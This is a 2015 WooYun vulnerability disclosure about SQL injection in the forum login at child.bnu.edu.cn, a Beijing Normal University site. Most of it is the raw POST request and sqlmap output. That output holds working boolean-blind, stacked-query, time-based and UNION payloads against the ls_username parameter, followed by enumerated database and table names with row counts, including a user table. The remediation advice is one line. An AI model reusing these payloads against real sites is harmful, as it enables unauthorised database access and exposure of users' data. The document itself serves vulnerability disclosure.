当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0155193

漏洞标题:北京师范大学某站SQL注入

相关厂商:北京师范大学

漏洞作者: 路人甲

提交时间:2015-11-23 15:26

修复时间:2015-11-28 15:28

公开时间:2015-11-28 15:28

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-23: 细节已通知厂商并且等待厂商处理中
2015-11-28: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

RT

详细说明:

http://child.bnu.edu.cn/


POST /luntan/LTType.aspx HTTP/1.1
Content-Length: 448
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://child.bnu.edu.cn
Cookie: ASP.NET_SessionId=lp4ji255fu5j2k45tb4zftrt; AJSTAT_ok_pages=2; AJSTAT_ok_times=1
Host: child.bnu.edu.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Button1=%b5%c7%c2%bc&ls_password=g00dPa%24%24w0rD&ls_username=-1&__EVENTVALIDATION=/wEWBALypLmbCALsi7bFAgKsreSLDwKM54rGBkZWYJdPMSLYK%2bfFSn/iT5VlY4d2&__VIEWSTATE=/wEPDwUKMTM4NDQ1ODQ4Nw9kFgICAw9kFg4CAQ8WAh4HVmlzaWJsZWdkAgMPFgIfAGhkAgcPDxYCHgRUZXh0BQQ1MzE3ZGQCCQ8PFgIfAQUFMTAzMTdkZAINDw8WAh8BBQMxMzJkZAIPDw8WAh8BBQExZGQCEQ8PFgIfAQUDMTMxZGRkznwtsahknYkGYok1CaSXRwR9oIo%3d&__VIEWSTATEGENERATOR=635B33AD


ls_username参数存在注入

sqlmap identified the following injection point(s) with a total of 188 HTTP(s) requests:
---
Parameter: ls_username (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (Generic comment)
Payload: Button1=%b5%c7%c2%bc&ls_password=g00dPa$$w0rD&ls_username=-7138' OR 1647=1647-- -&__EVENTVALIDATION=/wEWBALypLmbCALsi7bFAgKsreSLDwKM54rGBkZWYJdPMSLYK+fFSn/iT5VlY4d2&__VIEWSTATE=/wEPDwUKMTM4NDQ1ODQ4Nw9kFgICAw9kFg4CAQ8WAh4HVmlzaWJsZWdkAgMPFgIfAGhkAgcPDxYCHgRUZXh0BQQ1MzE3ZGQCCQ8PFgIfAQUFMTAzMTdkZAINDw8WAh8BBQMxMzJkZAIPDw8WAh8BBQExZGQCEQ8PFgIfAQUDMTMxZGRkznwtsahknYkGYok1CaSXRwR9oIo=&__VIEWSTATEGENERATOR=635B33AD
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: Button1=%b5%c7%c2%bc&ls_password=g00dPa$$w0rD&ls_username=-1';WAITFOR DELAY '0:0:5'--&__EVENTVALIDATION=/wEWBALypLmbCALsi7bFAgKsreSLDwKM54rGBkZWYJdPMSLYK+fFSn/iT5VlY4d2&__VIEWSTATE=/wEPDwUKMTM4NDQ1ODQ4Nw9kFgICAw9kFg4CAQ8WAh4HVmlzaWJsZWdkAgMPFgIfAGhkAgcPDxYCHgRUZXh0BQQ1MzE3ZGQCCQ8PFgIfAQUFMTAzMTdkZAINDw8WAh8BBQMxMzJkZAIPDw8WAh8BBQExZGQCEQ8PFgIfAQUDMTMxZGRkznwtsahknYkGYok1CaSXRwR9oIo=&__VIEWSTATEGENERATOR=635B33AD
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind (comment)
Payload: Button1=%b5%c7%c2%bc&ls_password=g00dPa$$w0rD&ls_username=-1' WAITFOR DELAY '0:0:5'--&__EVENTVALIDATION=/wEWBALypLmbCALsi7bFAgKsreSLDwKM54rGBkZWYJdPMSLYK+fFSn/iT5VlY4d2&__VIEWSTATE=/wEPDwUKMTM4NDQ1ODQ4Nw9kFgICAw9kFg4CAQ8WAh4HVmlzaWJsZWdkAgMPFgIfAGhkAgcPDxYCHgRUZXh0BQQ1MzE3ZGQCCQ8PFgIfAQUFMTAzMTdkZAINDw8WAh8BBQMxMzJkZAIPDw8WAh8BBQExZGQCEQ8PFgIfAQUDMTMxZGRkznwtsahknYkGYok1CaSXRwR9oIo=&__VIEWSTATEGENERATOR=635B33AD
Type: UNION query
Title: Generic UNION query (NULL) - 20 columns
Payload: Button1=%b5%c7%c2%bc&ls_password=g00dPa$$w0rD&ls_username=-1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(120)+CHAR(98)+CHAR(106)+CHAR(113)+CHAR(113)+CHAR(106)+CHAR(83)+CHAR(113)+CHAR(120)+CHAR(83)+CHAR(86)+CHAR(72)+CHAR(118)+CHAR(78)+CHAR(122)+CHAR(97)+CHAR(84)+CHAR(107)+CHAR(79)+CHAR(75)+CHAR(114)+CHAR(87)+CHAR(101)+CHAR(70)+CHAR(117)+CHAR(120)+CHAR(111)+CHAR(74)+CHAR(105)+CHAR(113)+CHAR(106)+CHAR(77)+CHAR(76)+CHAR(71)+CHAR(87)+CHAR(80)+CHAR(98)+CHAR(85)+CHAR(88)+CHAR(79)+CHAR(70)+CHAR(78)+CHAR(83)+CHAR(97)+CHAR(113)+CHAR(120)+CHAR(113)+CHAR(113)+CHAR(113),NULL,NULL,NULL,NULL-- -&__EVENTVALIDATION=/wEWBALypLmbCALsi7bFAgKsreSLDwKM54rGBkZWYJdPMSLYK+fFSn/iT5VlY4d2&__VIEWSTATE=/wEPDwUKMTM4NDQ1ODQ4Nw9kFgICAw9kFg4CAQ8WAh4HVmlzaWJsZWdkAgMPFgIfAGhkAgcPDxYCHgRUZXh0BQQ1MzE3ZGQCCQ8PFgIfAQUFMTAzMTdkZAINDw8WAh8BBQMxMzJkZAIPDw8WAh8BBQExZGQCEQ8PFgIfAQUDMTMxZGRkznwtsahknYkGYok1CaSXRwR9oIo=&__VIEWSTATEGENERATOR=635B33AD
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005


---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
available databases [5]:
[*] KGDB
[*] master
[*] model
[*] msdb
[*] tempdb


web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
Database: KGDB
+----------------+---------+
| Table | Entries |
+----------------+---------+
| dbo.lt_huifu | 10821 |
| dbo.XiaoYou | 8762 |
| dbo.lt_tiezi | 5527 |
| dbo.lt_user | 3041 |
| dbo.News | 1973 |
| dbo.lt_class | 71 |
| dbo.lt_bk | 67 |
| dbo.t_typename | 57 |
| dbo.xh_upfile | 29 |
| dbo.F_UserInfo | 12 |
| dbo.BigType | 8 |
| dbo.XiaoQu | 8 |
| dbo.lt_bktype | 7 |
| dbo.SmallType | 5 |
| dbo.ZhongXin | 2 |
+----------------+---------+

漏洞证明:

修复方案:

多处存在注入,整体改改吧

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-11-28 15:28

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无